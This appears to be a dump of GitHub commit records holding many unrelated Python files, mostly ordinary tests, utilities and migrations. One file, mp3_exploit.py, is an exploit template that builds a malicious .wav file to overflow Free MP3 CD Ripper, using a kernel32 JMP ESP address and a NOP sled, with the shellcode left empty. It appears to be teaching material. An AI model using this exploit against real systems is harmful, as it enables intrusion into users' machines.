return self.unique_for_fields + (self.attname, )
@cached_property
def unique_for_attnames(self):
return [self.model._meta.get_field(field_name).get_attname() for field_name in self.unique_for_fields]
| bsd-3-clause | Python |
|
419f86f5c50f812f19dd731e9c33f66e57f51a48 | Test matrix - work in progress | pycurl/pycurl,pycurl/pycurl,pycurl/pycurl | tests/matrix.py | tests/matrix.py | import os.path, urllib, subprocess, shutil
python_versions = ['2.4.6', '2.5.6', '2.6.8', '2.7.5']
libcurl_versions = ['7.19.0', '7.32.0']
class in_dir:
def __init__(self, dir):
self.dir = dir
def __enter__(self):
self.oldwd = os.getcwd()
os.chdir(self.dir)
def __exit__(self, type, value, traceback):
os.chdir(self.oldwd)
def fetch(url, archive):
if not os.path.exists(archive):
print "Fetching %s" % url
io = urllib.urlopen(url)
with open('.tmp.%s' % archive, 'w') as f:
while True:
chunk = io.read(65536)
if len(chunk) == 0:
break
f.write(chunk)
os.rename('.tmp.%s' % archive, archive)
def build(archive, dir, prefix):
if not os.path.exists(dir):
print "Building %s" % archive
subprocess.check_call(['tar', 'xf', archive])
with in_dir(dir):
subprocess.check_call(['./configure', '--prefix=%s' % prefix])
subprocess.check_call(['make'])
subprocess.check_call(['make', 'install'])
for python_version in python_versions:
url = 'http://www.python.org/ftp/python/%s/Python-%s.tgz' % (python_version, python_version)
archive = os.path.basename(url)
fetch(url, archive)
dir = archive.replace('.tgz', '')
prefix = os.path.abspath('i/%s' % dir)
build(archive, dir, prefix)
for libcurl_version in libcurl_versions:
url = 'http://curl.haxx.se/download/curl-%s.tar.gz' % libcurl_version
archive = os.path.basename(url)
fetch(url, archive)
dir = archive.replace('.tar.gz', '')
prefix = os.path.abspath('i/%s' % dir)
build(archive, dir, prefix)
fetch('https://raw.github.com/pypa/virtualenv/1.7/virtualenv.py', 'virtualenv-1.7.py')
if not os.path.exists('venv'):
os.mkdir('venv')
for python_version in python_versions:
for libcurl_version in libcurl_versions:
python_prefix = os.path.abspath('i/Python-%s' % python_version)
libcurl_prefix = os.path.abspath('i/curl-%s' % libcurl_version)
venv = os.path.abspath('venv/Python-%s-curl-%s' % (python_version, libcurl_version))
if os.path.exists(venv):
shutil.rmtree(venv)
subprocess.check_call(['python', 'virtualenv-1.7.py', venv, '-p', '%s/bin/python' % python_prefix])
with in_dir('pycurl'):
subprocess.check_call('make clean && . %s/bin/activate && make test' % venv, shell=True)
| lgpl-2.1 | Python |
|
c24647a921c64cfc8a1385f7e735622514e199c3 | make it clear that we don't depend on gabble version for the test | Ziemin/telepathy-gabble,mlundblad/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,community-ssu/telepathy-gabble,jku/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,Ziemin/telepathy-gabble,jku/telepathy-gabble,jku/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble | tests/test-caps-update.py | tests/test-caps-update.py | """
Test that CapabilitiesChanged signal is emitted only once after
all the caps in the presence have been analyzed.
"""
import dbus
from twisted.words.xish import domish
from servicetest import match, unwrap, lazy
from gabbletest import go, make_result_iq
def make_presence(from_jid, type, status):
presence = domish.Element((None, 'presence'))
if from_jid is not None:
presence['from'] = from_jid
if type is not None:
presence['type'] = type
if status is not None:
presence.addElement('status', content=status)
return presence
def caps_iface(proxy):
return dbus.Interface(proxy,
'org.freedesktop.Telepathy.Connection.Interface.Capabilities')
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
presence = make_presence('bob@foo.com/Foo', None, 'hello')
presence.addElement('priority', None, '0')
c = presence.addElement(('http://jabber.org/protocol/caps', 'c'))
c['node'] = 'http://telepathy.freedesktop.org/caps'
c['ver'] = '0.4.test-version'
c['ext'] = 'jingle-audio jingle-video'
data['stream'].send(presence)
return True
@lazy
@match('dbus-signal', signal='CapabilitiesChanged',
args=[[(2, u'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 0,
3, 0, 3)]])
def expect_CapabilitiesChanged(event, data):
data['conn_iface'].Disconnect()
return True
@match('dbus-signal')
def expect_disconnected(event, data):
assert event.signal != 'CapabilitiesChanged'
if event.signal == 'StatusChanged' and event.args == [2, 1]:
return True
return False
if __name__ == '__main__':
go()
|
"""
Test that CapabilitiesChanged signal is emitted only once after
all the caps in the presence have been analyzed.
"""
import dbus
from twisted.words.xish import domish
from servicetest import match, unwrap, lazy
from gabbletest import go, make_result_iq
def make_presence(from_jid, type, status):
presence = domish.Element((None, 'presence'))
if from_jid is not None:
presence['from'] = from_jid
if type is not None:
presence['type'] = type
if status is not None:
presence.addElement('status', content=status)
return presence
def caps_iface(proxy):
return dbus.Interface(proxy,
'org.freedesktop.Telepathy.Connection.Interface.Capabilities')
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
presence = make_presence('bob@foo.com/Foo', None, 'hello')
presence.addElement('priority', None, '0')
c = presence.addElement(('http://jabber.org/protocol/caps', 'c'))
c['node'] = 'http://telepathy.freedesktop.org/caps'
c['ver'] = '0.5.14'
c['ext'] = 'voice-v1 jingle-audio jingle-video'
data['stream'].send(presence)
return True
@lazy
@match('dbus-signal', signal='CapabilitiesChanged',
args=[[(2, u'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 0,
3, 0, 3)]])
def expect_CapabilitiesChanged(event, data):
data['conn_iface'].Disconnect()
return True
@match('dbus-signal')
def expect_disconnected(event, data):
assert event.signal != 'CapabilitiesChanged'
if event.signal == 'StatusChanged' and event.args == [2, 1]:
return True
return False
if __name__ == '__main__':
go()
| lgpl-2.1 | Python |
1ef3c14af249f211df4cdad89cdd49d7f2845eb1 | Add share count using Flask. | comicpanda/share-count-server,comicpanda/share-count-server | flask_share_count.py | flask_share_count.py | from flask import Flask, jsonify, request
import grequests, re, json
app = Flask(__name__)

# Per-service share/like count endpoints; %s is substituted with the URL.
FACEBOOK = 'https://api.facebook.com/method/links.getStats?urls=%s&format=json'
TWITTER = 'http://urls.api.twitter.com/1/urls/count.json?url=%s&callback=count'
REDDIT = 'http://buttons.reddit.com/button_info.json?url=%s'
STUMBLEUPON = 'http://www.stumbleupon.com/services/1.01/badge.getinfo?url=%s'
PINTEREST = 'http://widgets.pinterest.com/v1/urls/count.json?source=6&url=%s'
GOOGLE_PLUS = 'https://clients6.google.com/rpc?key=AIzaSyCKSbrvQasunBoV16zDH9R33D88CeLr9gQ'


@app.route('/')
def hello_world():
    return 'Hello World!'


def _google_plus_payload(target_url):
    """Build the JSON-RPC request body used to query the +1 count."""
    param = {}
    param['method'] = 'pos.plusones.get'
    param['id'] = 'p'
    param['params'] = {}
    param['params']['nolog'] = True
    param['params']['id'] = target_url
    param['params']['source'] = 'widget'
    param['params']['userId'] = '@viewer'
    param['params']['groupId'] = '@self'
    param['jsonrpc'] = '2.0'
    param['key'] = 'p'
    param['apiVersion'] = 'v1'
    return json.dumps([param])


@app.route('/count')
def total_count():
    """Aggregate share counts for ?url=... across six social services.

    Returns JSON {"result": "success", "total": N}, or
    {"result": "error", "total": -1} if the requests could not be built.
    """
    target_url = request.args.get('url')
    json_param = _google_plus_payload(target_url)
    try:
        requests = (
            grequests.get(FACEBOOK % (target_url)),
            grequests.get(TWITTER % (target_url)),
            grequests.get(REDDIT % (target_url)),
            grequests.get(STUMBLEUPON % (target_url)),
            grequests.get(PINTEREST % (target_url)),
            grequests.post(GOOGLE_PLUS, data=json_param)
        )
    except Exception:  # was a bare except: -- keep behaviour, narrow scope
        return jsonify(result='error', total=-1)
    responses = grequests.map(requests)
    # NOTE: order must match the request tuple above.
    counts = (
        parse_facebook(responses[0]),
        parse_twitter(responses[1]),
        parse_reddit(responses[2]),
        parse_stumbleupon(responses[3]),
        parse_pinterest(responses[4]),
        parse_googleplus(responses[5])
    )
    # FIX: removed leftover Py2 debug prints and the local `total_count`
    # variable that shadowed this function's own name.
    return jsonify(result='success', total=sum(counts))


def parse_facebook(res):
    """Shares + likes from the Facebook links.getStats response."""
    facebook_data = res.json()[0]
    return facebook_data['share_count'] + facebook_data['like_count']


def parse_twitter(res):
    """Count from the JSONP-wrapped Twitter response."""
    m = re.search(r'{.+}', res.content)
    return json.loads(m.group(0))['count']


def parse_reddit(res):
    """Score of the first matching submission, or 0 if none."""
    data = res.json()['data']
    if 'children' in data and data['children']:
        return data['children'][0]['data']['score']
    return 0


def parse_stumbleupon(res):
    """View count, or 0 when StumbleUpon has never seen the URL."""
    if 'views' in res.json()['result']:
        return int(res.json()['result']['views'])
    return 0


def parse_pinterest(res):
    """Count from the JSONP-wrapped Pinterest response."""
    m = re.search(r'{.+}', res.content)
    return json.loads(m.group(0))['count']


def parse_googleplus(res):
    """Global +1 count from the JSON-RPC batch response."""
    return int(res.json()[0]['result']['metadata']['globalCounts']['count'])


if __name__ == '__main__':
    app.run(port=8000, debug=True)
| apache-2.0 | Python |
|
7311f8f2a8a7ab285669dc02d26d7e2248583ff5 | Add tests for 'rle_compress' | ziotom78/polycomp | test_rle.py | test_rle.py | import pypolycomp
import numpy as np
def test_compression():
    """RLE-compress a short run and check the (count, value) pairs."""
    int_types = (np.int8, np.int16, np.int32, np.int64,
                 np.uint8, np.uint16, np.uint32, np.uint64)
    for dtype in int_types:
        result = pypolycomp.rle_compress(np.array([1, 1, 1, 2, 3], dtype=dtype))
        expected = np.array([3, 1, 1, 2, 1, 3], dtype=dtype)
        assert np.all(result == expected)
| bsd-3-clause | Python |
|
da2b773bf6e669b3ec50bbd6af73e1d80bb0b5a5 | Add tsstats/event.py for easy event-initialization | Thor77/TeamspeakStats,Thor77/TeamspeakStats | tsstats/events.py | tsstats/events.py | from collections import namedtuple
# Immutable record of a single entry on a client's timeline.  `arg` carries
# the action-specific payload; `arg_is_client` says whether that payload is
# another client's identifier.
Event = namedtuple(
    'Event', ['timestamp', 'identifier', 'action', 'arg', 'arg_is_client']
)


def nick(timestamp, identifier, nick):
    """Client changed its nickname to `nick`."""
    return Event(timestamp=timestamp, identifier=identifier,
                 action='set_nick', arg=nick, arg_is_client=False)


def connect(timestamp, identifier):
    """Client connected; the timestamp doubles as the payload."""
    return Event(timestamp=timestamp, identifier=identifier,
                 action='connect', arg=timestamp, arg_is_client=False)


def disconnect(timestamp, identifier):
    """Client disconnected; the timestamp doubles as the payload."""
    return Event(timestamp=timestamp, identifier=identifier,
                 action='disconnect', arg=timestamp, arg_is_client=False)


def kick(timestamp, identifier, target_identifier):
    """`identifier` kicked the client `target_identifier`."""
    return Event(timestamp=timestamp, identifier=identifier,
                 action='kick', arg=target_identifier, arg_is_client=True)


def ban(timestamp, identifier, target_identifier):
    """`identifier` banned the client `target_identifier`."""
    return Event(timestamp=timestamp, identifier=identifier,
                 action='ban', arg=target_identifier, arg_is_client=True)
| mit | Python |
|
99f5c2a9cd44ac8ed301a781460816e8f0dffdb8 | add killall.py example script | hybridlogic/psutil,hybridlogic/psutil,hybridlogic/psutil | examples/killall.py | examples/killall.py | #!/usr/bin/env python
"""
Kill a process by name.
"""
import os
import sys
import psutil
def main():
if len(sys.argv) != 2:
sys.exit('usage: %s name' % __file__)
else:
NAME = sys.argv[1]
killed = []
for proc in psutil.process_iter():
if proc.name == NAME and proc.pid != os.getpid():
proc.kill()
killed.append(proc.pid)
if not killed:
sys.exit('%s: no process found' % NAME)
else:
sys.exit(0)
sys.exit(main())
| bsd-3-clause | Python |
|
20c08b96ce7a5377576e45953266c51079b5bdeb | Create testfile.py | tesssny/firstrepository | testfile.py | testfile.py | print("Tess is cool")
| mit | Python |
|
d75eebbcb6b1922d37a97550bc4cbead6e50cfdb | add localdb.py | muchu1983/bennu,muchu1983/bennu,muchu1983/united | united/localdb.py | united/localdb.py | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import sqlite3
import os
import logging
from pkg_resources import resource_filename
"""
資料庫存取 類別
"""
class SQLite3Db:
#建構子
def __init__(self):
logging.basicConfig(level=logging.INFO)
dbPath = resource_filename("cameo_res", "local.db")
if os.path.exists(dbPath):#建立連線
logging.info("connect to sqlite3 db.")
self.conn = sqlite3.connect(dbPath)
else: #初始化資料庫並建立連線
logging.info("connect to sqlite3 db with initialization.")
self.conn = sqlite3.connect(dbPath)
c = self.conn.cursor()
c.execute("""CREATE TABLE table
(id INTEGER PRIMARY KEY)""")
self.conn.commit()
#解構子
def __del__(self):
logging.info("close sqlite3 db connection.")
self.conn.close() #關閉資料庫連線
# 執行 SQL 並 commit (適用於 INSERT、UPDATE、DELETE)
def commitSQL(self, strSQL=None):
c = self.conn.cursor()
c.execute(strSQL)
self.conn.commit()
# 執行 SQL 並 fetchall 資料 (適用於 SELECT)
def fetchallSQL(self, strSQL=None):
c = self.conn.cursor()
c.execute(strSQL)
return c.fetchall() | bsd-3-clause | Python |
|
b6d1b9365c356a14f0f9ef478247d498845a2b2c | add script to process normal vectors | bast/flanders,bast/flanders | coastline/data/vectors.py | coastline/data/vectors.py | import matplotlib.pyplot as plt
import glob
import math
def extract_data(file_name):
    """Read (x, y) point pairs from `file_name`, skipping 3 header lines."""
    points = []
    with open(file_name, 'r') as handle:
        for line_no, line in enumerate(handle):
            if line_no > 2:
                fields = line.split()
                points.append((float(fields[0]), float(fields[1])))
    return points


def normalize(vector, s):
    """Rescale a 2-D `vector` to have length `s`."""
    length = math.sqrt(vector[0]**2.0 + vector[1]**2.0)
    return (s*vector[0]/length, s*vector[1]/length)


def get_normal_vectors(points):
    """Normal vector (length 5000) at each point of a closed polygon.

    Each normal is perpendicular to the segment joining the point's two
    neighbours; the polygon wraps around at both ends.
    """
    count = len(points)
    vectors = []
    for i in range(count):
        before = points[i - 1]
        after = points[(i + 1) % count]
        normal = (after[1] - before[1], -(after[0] - before[0]))
        vectors.append(normalize(normal, 5000.0))
    return vectors
def add_plot(file_name, style):
    """Plot one coastline file as a line plus its normal-vector arrows."""
    points = extract_data(file_name)
    if len(points) > 3:  # for the moment cannot handle linear islands
        axes = plt.axes()
        normals = get_normal_vectors(points)
        for (px, py), (vx, vy) in zip(points, normals):
            axes.arrow(px, py, vx, vy, head_width=0.1, head_length=0.1, fc='k', ec='k')
        (xs, ys) = zip(*points)
        plt.plot(xs, ys, style)


for f in glob.glob('*.txt'):
    add_plot(f, 'r-')

#axes = plt.gca()
#axes.set_xlim([-20.0, 0.0])
#axes.set_ylim([40.0, 60.0])
plt.show()
| mpl-2.0 | Python |
|
1ac09013e8cf89e83418de0be9d83b87a0a20634 | Create mp3_exploit.py | funkandwagnalls/pythonpentest,funkandwagnalls/pythonpentest,funkandwagnalls/pythonpentest,liorvh/pythonpentest,liorvh/pythonpentest,liorvh/pythonpentest | mp3_exploit.py | mp3_exploit.py | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
'''
import struct

filename = "exploit.wav"

# 4112 filler bytes reach the saved return address on the stack.
fill = b"A" * 4112

#eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
eip = struct.pack('<I', 0x7C874413)  # JMP ESP instruction from Kernel32.dll
nop = b"\x90" * 16

# BUG FIX: the payload placeholders were empty *tuples* (`()`), and
# concatenating a tuple onto the buffer raises TypeError, so the script
# could never produce a file.  Empty byte strings keep the same
# "no payload yet" intent while remaining concatenable, and using bytes
# throughout writes the file unmangled on Python 3 as well.
calc = b""   # Place for calc.exe shellcode
shell = b""  # Place for actual shellcode

#exploit = fill + eip + nop + calc   # loader for simple proof of concept
exploit = fill + eip + nop + shell   # loader for real shell access

# Binary mode + context manager: no newline translation, handle always closed.
with open(filename, "wb") as writeFile:
    writeFile.write(exploit)
| bsd-3-clause | Python |
|
68ea60fd87e3e0240f82a42f0f6b4dcd65732f97 | Add MQTT server example | fabaff/mqtt-panel,fabaff/mqtt-panel,fabaff/mqtt-panel | mqtt-server.py | mqtt-server.py | #!/usr/bin/python3
#
# Copyright (c) 2015-2016, Fabian Affolter <fabian@affolter-engineering.ch>
# Released under the MIT license. See LICENSE file for details.
#
# Source: https://github.com/beerfactory/hbmqtt/blob/develop/samples/broker_start.py
#
import logging
import asyncio
import os  # NOTE(review): appears unused -- confirm before removing

from hbmqtt.broker import Broker

logger = logging.getLogger(__name__)

# Broker configuration: plain MQTT on all interfaces (default port 1883)
# plus a loopback-only websocket listener capped at 10 connections.
config = {
    'listeners': {
        'default': {
            'type': 'tcp',
            'bind': '0.0.0.0:1883',
        },
        'ws-mqtt': {
            'bind': '127.0.0.1:3000',
            'type': 'ws',
            'max_connections': 10,
        },
    },
}

broker = Broker(config)


@asyncio.coroutine
def test_coro():
    # Start the broker; it keeps serving while the event loop runs.
    yield from broker.start()


if __name__ == '__main__':
    formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
    logging.basicConfig(level=logging.INFO, format=formatter)
    # Start the broker, then spin the loop forever to keep serving clients.
    asyncio.get_event_loop().run_until_complete(test_coro())
    asyncio.get_event_loop().run_forever()
| mit | Python |
|
c0b05a43e10693f8aab87a7f86726d512b7494fc | Add tenant exporter for accounting | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/clients/management/commands/export_tenants.py | bluebottle/clients/management/commands/export_tenants.py | import json
from rest_framework.authtoken.models import Token
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from bluebottle.clients import properties
from bluebottle.clients.models import Client
from bluebottle.clients.utils import LocalTenant
class Command(BaseCommand):
    """Export per-tenant accounting data as JSON (stdout or --file)."""

    help = 'Export tenants, so that we can import them into the accounting app'

    def add_arguments(self, parser):
        # Optional output path; when omitted the JSON goes to stdout.
        parser.add_argument('--file', type=str, default=None, action='store')

    def handle(self, *args, **options):
        results = []
        for client in Client.objects.all():
            properties.set_tenant(client)
            with LocalTenant(client, clear_tenant=True):
                # Content types are cached per schema; reset between tenants.
                ContentType.objects.clear_cache()

                # Only docdata merchant accounts are exported.
                accounts = []
                for merchant in properties.MERCHANT_ACCOUNTS:
                    if merchant['merchant'] == 'docdata':
                        accounts.append(
                            {
                                'service_type': 'docdata',
                                'username': merchant['merchant_name']
                            }
                        )

                api_key = Token.objects.get(user__username='accounting').key
                results.append({
                    "name": client.schema_name,
                    "domain": properties.TENANT_MAIL_PROPERTIES['website'],
                    "api_key": api_key,
                    "accounts": accounts
                })

        if options['file']:
            # FIX: context manager closes the handle even if the write
            # fails (the original open/write/close leaked it on error).
            with open(options['file'], "w") as text_file:
                text_file.write(json.dumps(results))
        else:
            # Parenthesised single-argument print works on Python 2 and 3.
            print(json.dumps(results))
| bsd-3-clause | Python |
|
dfbf888ca0b56448a4f211900b16e3c85648b241 | Add migration for changing docstring of Note.is_private to unicode | editorsnotes/editorsnotes,editorsnotes/editorsnotes | editorsnotes/main/migrations/0025_auto_20160628_0913.py | editorsnotes/main/migrations/0025_auto_20160628_0913.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-28 09:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Schema state this migration builds on.
    dependencies = [
        ('main', '0024_topic_ld'),
    ]

    # Only the help_text metadata of Note.is_private changes; Django
    # records it for state tracking, no real DB schema change happens.
    operations = [
        migrations.AlterField(
            model_name='note',
            name='is_private',
            field=models.BooleanField(default=False, help_text="If true, will only be be viewable to users who belong to the note's project."),
        ),
    ]
| agpl-3.0 | Python |
|
a45a0bb366ae28d38d543ce71f32f625e9b80042 | add tools module | multidis/bitQuant,rosspalmer/bitQuant | modules/tools.py | modules/tools.py | from pandas import DataFrame
# FIX: `pandas.tseries.tools` was removed long ago; `to_datetime` has lived
# at the package top level since early pandas, and `concat` replaces the
# removed DataFrame.append below.
from pandas import concat, to_datetime


#|Create time series from trade history DataFrame
def time_series(df, period):
    """Aggregate a trade history into OHLC bars of `period` seconds.

    `df` must carry 'timestamp', 'price' and 'amount' columns; the result
    is indexed by the bar's datetime (see date_index).
    """
    tmin = int(df['timestamp'].min())
    tmax = int(df['timestamp'].max())
    # FIX: collect the per-bar frames and concatenate once at the end;
    # DataFrame.append was removed in pandas 2.0 and was O(n^2) anyway.
    slices = [time_slice(df, tsmp, period)
              for tsmp in range(tmin, tmax, period)]
    if slices:
        ts = concat(slices, ignore_index=True)
    else:
        ts = DataFrame(columns=('timestamp', 'price', 'high',
                                'low', 'open', 'amount'))
    ts = date_index(ts)
    return ts


def time_slice(df, tsmp, period):
    """Build the single OHLC row for the bar starting at `tsmp`."""
    lprice = df[df['timestamp'] < tsmp].tail(1)['price']
    df = df[df['timestamp'] >= tsmp]
    df = df[df['timestamp'] < (tsmp + period)]
    if len(df.index) == 0:
        # No trades this bar: carry the last known price forward, zero volume.
        slic = DataFrame({'timestamp': [tsmp], 'price': lprice,
                          'high': lprice, 'low': lprice,
                          'open': lprice, 'amount': 0.0})
    else:
        slic = DataFrame({'timestamp': [tsmp],
                          'price': round(df['price'].iloc[-1], 3),
                          'high': round(df['price'].max(), 3),
                          'low': round(df['price'].min(), 3),
                          'open': round(df['price'].iloc[0], 3),
                          'amount': round(df['amount'].sum(), 4)})
    return slic


#|Create datetime index for DataFrame using "timestamp" column
def date_index(df):
    """Add a 'date' column from epoch seconds and make it the index."""
    date = df['timestamp']
    date = to_datetime(date, unit='s')
    df['date'] = date
    df = df.set_index('date')
    return df


#Outputs number of seconds in provided number of days/hours/minutes
def seconds(days=0, hours=0, minutes=0, typ=''):
    """Seconds in the given span; with `typ` set, one unit of d/h/m.

    NOTE(review): when `typ` is given the day/hour/minute counts are
    ignored, matching the original behaviour.
    """
    if typ == '':
        total = 86400*days + 3600*hours + 60*minutes
    elif typ == 'd':
        total = 86400
    elif typ == 'h':
        total = 3600
    elif typ == 'm':
        # BUG FIX: was 50 -- a minute has 60 seconds.
        total = 60
    return total
| mit | Python |
|
2f4d413e14011847138d6afd27a210fc58823c8a | add certificate and key migrations | deis/workflow,deis/workflow,deis/workflow | rootfs/api/migrations/0004_auto_20160124_2134.py | rootfs/api/migrations/0004_auto_20160124_2134.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-24 21:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Schema state this migration builds on.
    dependencies = [
        ('api', '0003_auto_20160114_0310'),
    ]

    # Marks two auto-managed fields as non-editable; this only changes
    # Django's field metadata, not the underlying database columns.
    operations = [
        migrations.AlterField(
            model_name='certificate',
            name='expires',
            field=models.DateTimeField(editable=False),
        ),
        migrations.AlterField(
            model_name='key',
            name='fingerprint',
            field=models.CharField(editable=False, max_length=128),
        ),
    ]
| mit | Python |
|
d1aa553f739e91cd470eea23042b6c8bcebe9b6f | add mocked integrationtest for the deprecationwarning of makeitem | RonnyPfannschmidt/pytest,The-Compiler/pytest,hackebrot/pytest,Akasurde/pytest,txomon/pytest,rmfitzpatrick/pytest,davidszotten/pytest,alfredodeza/pytest,nicoddemus/pytest,pfctdayelise/pytest,markshao/pytest,tomviner/pytest,ddboline/pytest,The-Compiler/pytest,nicoddemus/pytest,tareqalayan/pytest,tomviner/pytest,pytest-dev/pytest | testing/python/test_deprecations.py | testing/python/test_deprecations.py | import pytest
from _pytest.python import PyCollector
class PyCollectorMock(PyCollector):
    """Minimal PyCollector stand-in that records _makeitem invocations."""

    def __init__(self):
        self.called = False

    def _makeitem(self, *args):
        """Record the call instead of building a real item."""
        self.called = True


def test_pycollector_makeitem_is_deprecated():
    # Calling the public, deprecated makeitem() must warn and delegate
    # to the internal _makeitem hook.
    mock_collector = PyCollectorMock()
    with pytest.deprecated_call():
        mock_collector.makeitem('foo', 'bar')
    assert mock_collector.called
| mit | Python |
|
e348ec573a4882258466cdc2ab73da8b4dbbe256 | Create pillu.py | jasuka/pyBot,jasuka/pyBot | modules/pillu.py | modules/pillu.py | #test
| mit | Python |
|
1eb2e1390d41c65943e777a66918df87b4ee8799 | Add constructive_hierarchy | louisswarren/hieretikz | constructive_hierarchy.py | constructive_hierarchy.py | '''Reason about a directed graph in which the (non-)existance of some edges
must be inferred by the disconnectedness of certain vertices. Collect (truthy)
evidence for boolean function return values.'''
def transitive_closure_set(vertices, edges):
    '''Find the transitive closure of a set of vertices.

    `edges` is an iterable of (a, b) pairs; the result is the smallest
    superset of `vertices` closed under following edges forward.
    '''
    # BUG FIX: this used to build a dict {b: (a, b)} and then evaluate
    # `vertices | neighbours` -- a set|dict union, which raises TypeError
    # whenever the closure has to grow.  A plain set of successor
    # vertices is what both the subset test and the union need.
    reachable = {b for a, b in edges if a in vertices}
    if reachable.issubset(vertices):
        return vertices
    return transitive_closure_set(vertices | reachable, edges)
#def downward_closure(vertex, edges):
# '''Find the downward closure of a vertex.'''
# return transitive_closure_set({vertex}, edges)
#
#def upward_closure(vertex, edges):
# '''Find the upward closure of a vertex.'''
# return transitive_closure_set({vertex}, {(b, a) for a, b in edges})
#
#def is_connected(a, b, edges):
# '''Check if there is a path from a to b.'''
# return b in downward_closure(a, edges)
#
#def is_separated(a, b, edges, disconnections):
# '''Check that a and b will remain not connected even if edges are added to
# the graph, as long as the vertex pairs listed in disconnections remain
# disconected.'''
# return any((p, q) in disconnections
# for p in upward_closure(a, edges)
# for q in downward_closure(b, edges))
#
#def find_possible_connections(vertices, edges, disconnections):
# '''Find which edges can be added to create new connections, without
# connecting any pairs in disconnections.'''
# return {(a, b) for a in vertices for b in vertices if
# not is_connected(a, b, edges) and
# not is_separated(a, b, edges, disconnections)}
#
#def is_isthmus(edge, edges):
# return not is_connected(*edge, edges - {edge})
#
#def spanning_tree(edges):
# for edge in edges:
# if not is_isthmus(edge, edges):
# return spanning_tree(edges - {edge})
# return edges
#
#def rank_possible_edge(edge, vertices, edges, disconnections):
# evaluator = lambda x, y: len(find_possible_connections(vertices, x, y))
# exists_rank = evaluator(edges | {edge}, disconnections)
# not_exists_rank = evaluator(edges, disconnections | {edge})
# return abs(exists_rank) + abs(not_exists_rank)
| mit | Python |
|
25ff8c6f8bc9d70886d004f8b64f08facb8c12cf | Create Find the Celebrity sol for Leetcode | Chasego/cod,cc13ny/algo,cc13ny/Allin,Chasego/cod,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/codirit,cc13ny/algo,cc13ny/Allin,cc13ny/algo,Chasego/codirit,cc13ny/algo,Chasego/codi,Chasego/codi,Chasego/codi,cc13ny/Allin,Chasego/codirit,Chasego/codi,Chasego/cod,Chasego/codi,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/cod | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | # The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
class Solution(object):
    def findCelebrity(self, n):
        """Return the celebrity's index among n people, or -1 if none.

        :type n: int
        :rtype: int
        """
        if n < 2:
            return -1

        # Pass 1: a single sweep leaves exactly one viable candidate,
        # since every `knows` answer eliminates one of the two people.
        cand = 0
        for person in range(1, n):
            if not knows(person, cand):
                cand = person

        # Pass 2: verify -- everyone else must know the candidate, and
        # the candidate must know nobody.
        for person in range(n):
            if person == cand:
                continue
            if not knows(person, cand) or knows(cand, person):
                return -1

        return cand
| mit | Python |
|
3eeaa890f0a7afcf7a6f470055c5bc0fda20ae5c | create moistureCaptor.py | TyBeeProject/TyBeeHive | captors-enabled/moistureCaptor.py | captors-enabled/moistureCaptor.py |
class Captor():
    """Moisture captor stub for the hive's sensor framework."""

    # Default captor identifier; kept as a class attribute for backward
    # compatibility with code reading Captor.id directly.
    id = 5

    def __init__(self):
        # BUG FIX: the original `def Captor():` "constructor" took no
        # `self` parameter and referenced an undefined `self`, so any
        # call to it crashed.  __init__ gives the intended effect.
        self.id = 5

    def callback(self):
        """Read the moisture value (stubbed to 0 for now)."""
        moisture = 0
        #start communication with server
        return moisture

    def getiId(self):
        # (sic) name kept as-is -- external callers may rely on it.
        return self.id
| mit | Python |
|
25aa486fcba631a251db4f0366d4d4f713a86f37 | Add missing migration file | sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web,sigmapi-gammaiota/sigmapi-web | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Schema state this migration builds on.
    dependencies = [
        ('UserInfo', '0002_auto_20161208_1712'),
    ]

    # Meta-options only (default ordering + admin display names);
    # AlterModelOptions never touches the database schema itself.
    operations = [
        migrations.AlterModelOptions(
            name='pledgeclass',
            options={'ordering': ['dateInitiated'], 'verbose_name': 'Pledge Class', 'verbose_name_plural': 'Pledge Classes'},
        ),
    ]
| mit | Python |
|
5e51cda3a7441f6e31477988b1288d1497fe23d9 | Add arguments snippet | ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content,ScriptRock/content | code/python/snippets/arguments.py | code/python/snippets/arguments.py | """
Add command line arguments to your script.
This snippet adds the default command line arguments required for any interaction with the UpGuard API.
To Use:
1. Copy snippet to the top of your script
2. Populate description (this is shown when running `--help`)
3. Access arguments with `args` object, for example: `args.target_url`
"""
import argparse

# Standard connection flags shared by every UpGuard API script; the
# description below is what `--help` shows.
parser = argparse.ArgumentParser(description='Retrieve a list of open User Tasks and their associated nodes')
parser.add_argument('--target-url', required=True, help='URL for the UpGuard instance')
